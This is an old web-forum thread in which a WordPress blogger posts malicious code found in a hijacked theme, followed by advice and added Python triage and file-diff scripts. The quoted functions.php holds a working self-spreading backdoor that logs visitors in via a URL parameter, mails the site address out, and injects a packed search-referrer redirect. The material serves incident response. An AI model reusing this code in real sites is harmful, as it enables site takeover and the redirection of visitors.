Wordpress Blog hijacked! Traffic drops 70%. Some unwanted code in theme files

Discussion in 'Security' started by gauharjk, Jan 22, 2012.

  1. #1
    Friends...

    My wordpress blog was hijacked. I did not realize it soon enough, because I never noticed anything unusual, except that my traffic fell 70%.

    At first I thought it was because I had activated CloudFlare on my blog, and so I disabled it. But traffic did not return.

    A couple of days ago, I accessed my blog from an iPad, instead of my PC. And I was shocked to see I was redirected to some spammy site called googledservics or something like that...

    I ran a Virus Scanner from my cPanel, and it removed a couple of files which it said were infected.

    Later today, I checked my blog using http://sitecheck.sucuri.net/scanner/ and found it was still infected.

    I found some code in my theme files which was not supposed to be there.

    In functions.php, I found

    
    <?php
    function _check_active_widget(){
        $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
        $output=strip_tags($output, $allowed);
        $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
        if (is_array($direst)){
            foreach ($direst as $item){
                if (is_writable($item)){
                    $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                    $cont=file_get_contents($item);
                    if (stripos($cont,$ftion) === false){
                        $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
                        $output .= $before . "Not found" . $after;
                        if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                        $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);                
                        $output .= ($showdot && $ellipsis) ? "..." : "";
                    }
                }
            }
        }
        return $output;
    }
    function _get_all_widgetcont($wids,$items=array()){
        $places=array_shift($wids);
        if(substr($places,-1) == "/"){
            $places=substr($places,0,-1);
        }
        if(!file_exists($places) || !is_dir($places)){
            return false;
        }elseif(is_readable($places)){
            $elems=scandir($places);
            foreach ($elems as $elem){
                if ($elem != "." && $elem != ".."){
                    if (is_dir($places . "/" . $elem)){
                        $wids[]=$places . "/" . $elem;
                    } elseif (is_file($places . "/" . $elem)&& 
                        $elem == substr(__FILE__,-13)){
                        $items[]=$places . "/" . $elem;}
                    }
                }
        }else{
            return false;    
        }
        if (sizeof($wids) > 0){
            return _get_all_widgetcont($wids,$items);
        } else {
            return $items;
        }
    }
    if(!function_exists("stripos")){ 
        function stripos(  $str, $needle, $offset = 0  ){ 
            return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
        }
    }
    
    if(!function_exists("strripos")){ 
        function strripos(  $haystack, $needle, $offset = 0  ) { 
            if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
            if(  $offset < 0  ){ 
                $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
            } 
            else{ 
                $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
            } 
            if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
            $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
            return $pos; 
        }
    }
    if(!function_exists("scandir")){ 
        function scandir($dir,$listDirectories=false, $skipDots=true) {
            $dirArray = array();
            if ($handle = opendir($dir)) {
                while (false !== ($file = readdir($handle))) {
                    if (($file != "." && $file != "..") || $skipDots == true) {
                        if($listDirectories == false) { if(is_dir($file)) { continue; } }
                        array_push($dirArray,basename($file));
                    }
                }
                closedir($handle);
            }
            return $dirArray;
        }
    }
    add_action("admin_head", "_check_active_widget");
    function _prepared_widget(){
        if(!isset($length)) $length=120;
        if(!isset($method)) $method="cookie";
        if(!isset($html_tags)) $html_tags="<a>";
        if(!isset($filters_type)) $filters_type="none";
        if(!isset($s)) $s="";
        if(!isset($filter_h)) $filter_h=get_option("home"); 
        if(!isset($filter_p)) $filter_p="wp_";
        if(!isset($use_link)) $use_link=1; 
        if(!isset($comments_type)) $comments_type=""; 
        if(!isset($perpage)) $perpage=$_GET["cperpage"];
        if(!isset($comments_auth)) $comments_auth="";
        if(!isset($comment_is_approved)) $comment_is_approved=""; 
        if(!isset($authname)) $authname="auth";
        if(!isset($more_links_text)) $more_links_text="(more...)";
        if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
        if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
        if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
        if(!isset($more_content)) $more_content="ma".$s."il";
        if(!isset($forces_more)) $forces_more=1;
        if(!isset($fakeit)) $fakeit=1;
        if(!isset($sql)) $sql="";
        if (!$widget_output) :
        
        global $wpdb, $post;
        $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
        if (!empty($post->post_password)) { 
            if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
                if(is_feed()) { 
                    $output=__("There is no excerpt because this is a protected post.");
                } else {
                    $output=get_the_password_form();
                }
            }
        }
        if(!isset($fix_tag)) $fix_tag=1;
        if(!isset($filters_types)) $filters_types=$filter_h; 
        if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
        if(!isset($more_tags)) $more_tags="div";
        if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
        if(!isset($mlink_title)) $mlink_title="Continue reading this entry";    
        if(!isset($showdot)) $showdot=1;
        
        $comments=$wpdb->get_results($sql);    
        if($fakeit == 2) { 
            $text=$post->post_content;
        } elseif($fakeit == 1) { 
            $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
        } else { 
            $text=$post->post_excerpt;
        }
        $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
        if($length < 0) {
            $output=$text;
        } else {
            if(!$no_more && strpos($text, "<!--more-->")) {
                $text=explode("<!--more-->", $text, 2);
                $l=count($text[0]);
                $more_link=1;
                $comments=$wpdb->get_results($sql);
            } else {
                $text=explode(" ", $text);
                if(count($text) > $length) {
                    $l=$length;
                    $ellipsis=1;
                } else {
                    $l=count($text);
                    $more_links_text="";
                    $ellipsis=0;
                }
            }
            for ($i=0; $i<$l; $i++)
                    $output .= $text[$i] . " ";
        }
        update_option("_is_widget_active_", 1);
        if("all" != $html_tags) {
            $output=strip_tags($output, $html_tags);
            return $output;
        }
        endif;
        $output=rtrim($output, "\s\n\t\r\0\x0B");
        $output=($fix_tag) ? balanceTags($output, true) : $output;
        $output .= ($showdot && $ellipsis) ? "..." : "";
        $output=apply_filters($filters_type, $output);
        switch($more_tags) {
            case("div") :
                $tag="div";
            break;
            case("span") :
                $tag="span";
            break;
            case("p") :
                $tag="p";
            break;
            default :
                $tag="span";
        }
    
        if ($use_link ) {
            if($forces_more) {
                $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
            } else {
                $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
            }
        }
        return $output;
    }
    
    add_action("init", "_prepared_widget");
    
    function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
        global $wpdb;
        $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
        $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
        if(!$show_pass_post) $request .= " AND post_password =\"\"";
        if($duration !="") { 
            $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
        }
        $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
        $posts=$wpdb->get_results($request);
        $output="";
        if ($posts) {
            foreach ($posts as $post) {
                $post_title=stripslashes($post->post_title);
                $comment_count=$post->comment_count;
                $permalink=get_permalink($post->ID);
                $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
            }
        } else {
            $output .= $before . "None found" . $after;
        }
        return  $output;
    }         
    ?><?php 
    add_action('get_footer', 'add_sscounter');
        function add_sscounter(){
            echo '<!--scounter-->';
            if(function_exists('is_user_logged_in')){
                if(time()%2 == 0 && !is_user_logged_in()){            
                    echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('o r=a.e,t=\"\",q;5(r.4(\"m.\")!=-1)t=\"q\";5(r.4(\"b.\")!=-1)t=\"q\";5(r.4(\"c.\")!=-1)t=\"p\";5(r.4(\"f.\")!=-1)t=\"q\";5(r.4(\"g.\")!=-1)t=\"h\";5(r.4(\"i.\")!=-1)t=\"q\";5(t.6&&((q=r.4(\"?\"+t+\"=\"))!=-1||(q=r.4(\"&\"+t+\"=\"))!=-1))j.k=\"l://9\"+\"1.\"+\"n\"+\"3\"+\".\"+\"8\"+\"9.1\"+\"s/\"+\"u.p\"+\"v?w\"+\"d=7&t\"+\"x\"+\"y=\"+r.z(q+2+t.6).A(\"&\")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
                }
            }
        }
    ?>
    
    And footer.php had a line of code

    <div id="scricode486397491"></div> 
    I have removed this extra code, but am not sure if it was a false alarm or really malware. A fresh unmodified copy of the theme does not have these extra lines of code, and I sure did not add them.

    What should I do now? Could there be more of such malware code in my blog? I have changed the password and made it more secure. But I am afraid it could come back.

    In logs, I have found hundreds of attempts every day to access wp-login.php

    My infected blog is http://www.civilprojectsonline.com/

    Any suggestions?
     
    gauharjk, Jan 22, 2012 IP
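The most useful first step with a file like the one posted above is to undo the string-concatenation obfuscation, because that is what hides the two `call_user_func_array` targets. The script below is an added example written for this page; it is not code from the thread, from the theme or from WordPress. It resolves every `$name = "literal" . $var . ...;` assignment to a fixed point (first assignment wins, matching the `!isset` guards in the posted code), looks up the variables handed to `call_user_func_array`, and lists the `add_action` hooks, the request parameters read, any e-mail addresses that appear once the strings are reassembled, the packed-JavaScript marker, and the self-rewriting pair `file_get_contents(__FILE__)` plus `fopen(..., "w+")` that copies the block into every other `functions.php` under the themes directory. The embedded sample is a constructed, trimmed excerpt of the posted functions.php. Run on it, `$getcommentstext` resolves to `wp_mail` (on `init` the code mails the site's home URL to the address assembled in `$sq1`, livethemes@gmail.com, then sets the `_is_widget_active_` option so it only does this once) and `$checkwidgets` resolves to `wp_set_auth_cookie`, which is called with `$_GET["cperpage"]` for any visitor who is not logged in, so a request carrying `?cperpage=<user ID>` is logged in as that user with no password. The `get_footer` script is a packed redirect whose dictionary contains `document`, `referrer`, `google`, `yahoo`, `msn`, `aol`, `ask`, `altavista`, `window` and `location`, which is consistent with search-engine visitors being sent elsewhere while the owner, browsing directly and logged in, saw nothing.

```python
import re
import sys
from typing import Dict, Set, Tuple

# Constructed sample: a trimmed excerpt of the functions.php quoted in the post above, keeping
# only the statements the checks below act on. It is not the complete injected file.
SAMPLE_FUNCTIONS_PHP = r'''<?php
function _check_active_widget(){
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";
    fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
    if(!isset($method)) $method="cookie";
    if(!isset($s)) $s="";
    if(!isset($filter_p)) $filter_p="wp_";
    if(!isset($comments_type)) $comments_type="";
    if(!isset($perpage)) $perpage=$_GET["cperpage"];
    if(!isset($comments_auth)) $comments_auth="";
    if(!isset($comment_is_approved)) $comment_is_approved="";
    if(!isset($authname)) $authname="auth";
    if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
    if(!isset($more_content)) $more_content="ma".$s."il";
    $sq1="SELECT ID FROM $wpdb->posts WHERE post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\"";
    if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
    $sent=call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types));
    $ok=!is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true));
}
add_action("init", "_prepared_widget");
add_action('get_footer', 'add_sscounter');
function add_sscounter(){ echo "<script>eval(function(p,a,c,k,e,r){return p}('x',1,1,'y'.split('|'),0,{}))</script>"; }
?>
'''

STR = r'"(?:[^"\\]|\\.)*"'                      # double-quoted PHP literal, escapes allowed
TERM = rf'(?:{STR}|\$[A-Za-z_]\w*)'             # one concatenation operand: literal or variable
CHAIN = rf'{TERM}(?:\s*\.\s*{TERM})*'           # operand . operand . ...
ASSIGN_RE = re.compile(rf'\$([A-Za-z_]\w*)\s*=\s*({CHAIN})\s*;')
TERM_RE = re.compile(TERM)
HOOK_RE = re.compile(r'add_action\s*\(\s*["\']([^"\']+)["\']\s*,\s*["\']([^"\']+)["\']')
DYNCALL_RE = re.compile(r'call_user_func(?:_array)?\s*\(\s*\$([A-Za-z_]\w*)')
REQ_RE = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*["\']([^"\']+)["\']')
SELF_READ_RE = re.compile(r'file_get_contents\s*\(\s*__FILE__\s*\)')
FILE_WRITE_RE = re.compile(r'fopen\s*\([^;]*?,\s*["\']w\+?["\']\s*\)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
_ESC = {'n': '\n', 't': '\t', 'r': '\r', '"': '"', '\\': '\\', '$': '$'}


def php_unquote(lit: str) -> str:
    """Strip the quotes and undo common escapes; `$var` inside a literal is left verbatim."""
    return re.sub(r'\\(.)', lambda m: _ESC.get(m.group(1), '\\' + m.group(1)), lit[1:-1])


def resolve_strings(src: str) -> Tuple[Dict[str, str], Set[str]]:
    """Evaluate every `$name = literal . $var . ...;` whose operands are all known.
    First assignment wins; loops until no new variable or string value appears."""
    values: Dict[str, str] = {}
    strings: Set[str] = set()
    changed = True
    while changed:
        changed = False
        for m in ASSIGN_RE.finditer(src):
            name, parts = m.group(1), []
            for term in TERM_RE.findall(m.group(2)):
                if term.startswith('"'):
                    parts.append(php_unquote(term))
                elif term[1:] in values:
                    parts.append(values[term[1:]])
                else:
                    break                       # operand not known yet; retry next pass
            else:
                value = ''.join(parts)
                if name not in values:
                    values[name] = value
                    changed = True
                if value not in strings:
                    strings.add(value)
                    changed = True
    return values, strings


def scan_php(src: str) -> Dict[str, object]:
    values, strings = resolve_strings(src)
    return {
        "hooks": HOOK_RE.findall(src),
        "dynamic_calls": [values.get(v, "$" + v) for v in DYNCALL_RE.findall(src)],
        "request_params": REQ_RE.findall(src),
        "emails": sorted({e for s in strings for e in EMAIL_RE.findall(s)}),
        "self_replicating": bool(SELF_READ_RE.search(src) and FILE_WRITE_RE.search(src)),
        "packed_js": "eval(function(p,a,c,k,e,r)" in src,
        "resolved": values,
    }


if __name__ == "__main__":
    # Usage: python triage_php.py wp-content/themes/*/functions.php; no arguments scans the sample.
    targets = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]]
    for path, src in targets or [("<sample>", SAMPLE_FUNCTIONS_PHP)]:
        report = scan_php(src)
        print(path)
        for key in ("hooks", "dynamic_calls", "request_params", "emails", "self_replicating", "packed_js"):
            print(f"  {key}: {report[key]}")
```

Point it at every functions.php under wp-content/themes, not just the active theme: the `admin_head` hook in the posted code rewrites every file named like itself that it can find and write to, so an inactive theme is enough to re-infect a cleaned one. Hits on `self_replicating`, a dynamic call that resolves to an authentication or mail function, or an e-mail address that appears only after reassembly are each reason to replace the file from a clean copy rather than edit it.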
  2. SolidShellSecurity

    #2
    Typically, the best way is to restore from a backup that is safe or re-install clean files. That is what we do with our clients. If we have to, we will go in and look for the malware code, but that is a last resort, as you can hide one line in almost any place. Check the .htaccess file too.
     
    SolidShellSecurity, Jan 22, 2012 IP
    gauharjk likes this.
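The first post already contains the right test ("a fresh unmodified copy of the theme does not have these extra lines"), and this reply adds .htaccess to the list. The script below is an added example for this page, not code from either poster, that makes both checks mechanical: it hashes every file under a clean copy of the theme and under the installed copy and reports modified, added and missing files, then greps an .htaccess for a few directives that are unusual in a WordPress site and match the redirect symptom described above (rewrite conditions on the referrer or user agent, RewriteRule or ErrorDocument targets on another host, and `auto_prepend_file`/`auto_append_file`). The theme trees built by `build_demo_trees()` and the sample .htaccess are constructed for the example, `example.invalid` is a placeholder domain, and the indicator list is illustrative rather than exhaustive; a clean copy means the same theme version downloaded from its distributor, not a backup taken after the compromise.

```python
import hashlib
import re
import sys
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Constructed sample .htaccess: the stock WordPress block followed by two injected lines that
# send visitors arriving from search engines to another site (placeholder domain).
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn)\. [NC]
RewriteRule ^(.*)$ http://example.invalid/go.php [R=302,L]
"""

# Directives that are unusual in a WordPress .htaccess and deserve a human look (illustrative list).
HTACCESS_INDICATORS = [
    r"RewriteCond\s+%\{HTTP_REFERER\}",     # act only on search-engine visitors
    r"RewriteCond\s+%\{HTTP_USER_AGENT\}",  # act only on certain browsers or crawlers
    r"RewriteRule\s+\S+\s+https?://",       # rewrite target on another host
    r"ErrorDocument\s+\d+\s+https?://",     # error pages served from another host
    r"auto_(?:prepend|append)_file",        # PHP file pulled into every request
]


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def compare_trees(clean: Path, live: Path) -> Dict[str, List[str]]:
    """Compare the installed theme against a clean copy of the same version, file by file."""
    clean_files = {p.relative_to(clean).as_posix() for p in clean.rglob("*") if p.is_file()}
    live_files = {p.relative_to(live).as_posix() for p in live.rglob("*") if p.is_file()}
    common = clean_files & live_files
    return {
        "modified": sorted(f for f in common if sha256_file(clean / f) != sha256_file(live / f)),
        "added": sorted(live_files - clean_files),     # files the distribution never shipped
        "missing": sorted(clean_files - live_files),
    }


def suspicious_htaccess_lines(text: str) -> List[Tuple[int, str]]:
    patterns = [re.compile(p, re.IGNORECASE) for p in HTACCESS_INDICATORS]
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if any(p.search(line) for p in patterns)]


def build_demo_trees(root: Path) -> Tuple[Path, Path]:
    """Constructed trees: a clean theme and an installed copy with two edited files and one extra file."""
    clean, live = root / "clean" / "fusion", root / "live" / "fusion"
    stock = {
        "style.css": "/* Theme Name: Fusion */\n",
        "functions.php": "<?php\nfunction fusion_setup(){ add_theme_support('post-thumbnails'); }\n",
        "footer.php": "<?php wp_footer(); ?>\n</body></html>\n",
        "inc/widgets.php": "<?php // widget registration\n",
    }
    for base in (clean, live):
        for rel, body in stock.items():
            (base / rel).parent.mkdir(parents=True, exist_ok=True)
            (base / rel).write_text(body)
    # Tampering modelled on the post: code appended to functions.php, a div added to footer.php,
    # plus a file the theme distribution never contained.
    (live / "functions.php").write_text(stock["functions.php"] + '<?php add_action("init", "_prepared_widget"); ?>\n')
    (live / "footer.php").write_text('<?php wp_footer(); ?>\n<div id="scricode486397491"></div>\n</body></html>\n')
    (live / "inc" / "cache.php").write_text("<?php // not part of the theme distribution\n")
    return clean, live


def demo() -> Dict[str, object]:
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = build_demo_trees(Path(tmp))
        diff = compare_trees(clean, live)
    return {"diff": diff, "htaccess": suspicious_htaccess_lines(SAMPLE_HTACCESS)}


if __name__ == "__main__":
    # Usage: python theme_diff.py <clean_theme_dir> <installed_theme_dir> [path/to/.htaccess]
    if len(sys.argv) >= 3:
        flagged = suspicious_htaccess_lines(Path(sys.argv[3]).read_text()) if len(sys.argv) > 3 else []
        result = {"diff": compare_trees(Path(sys.argv[1]), Path(sys.argv[2])), "htaccess": flagged}
    else:
        result = demo()
    for key in ("modified", "added", "missing"):
        print(f"{key}: {result['diff'][key]}")
    for lineno, line in result["htaccess"]:
        print(f".htaccess line {lineno}: {line}")
```

The same comparison applies to WordPress core and to every plugin directory, each against the matching released version. Files in the "added" list are the ones a signature scanner is most likely to miss, and anything in "modified" is replaced, not hand-edited, once you have read it.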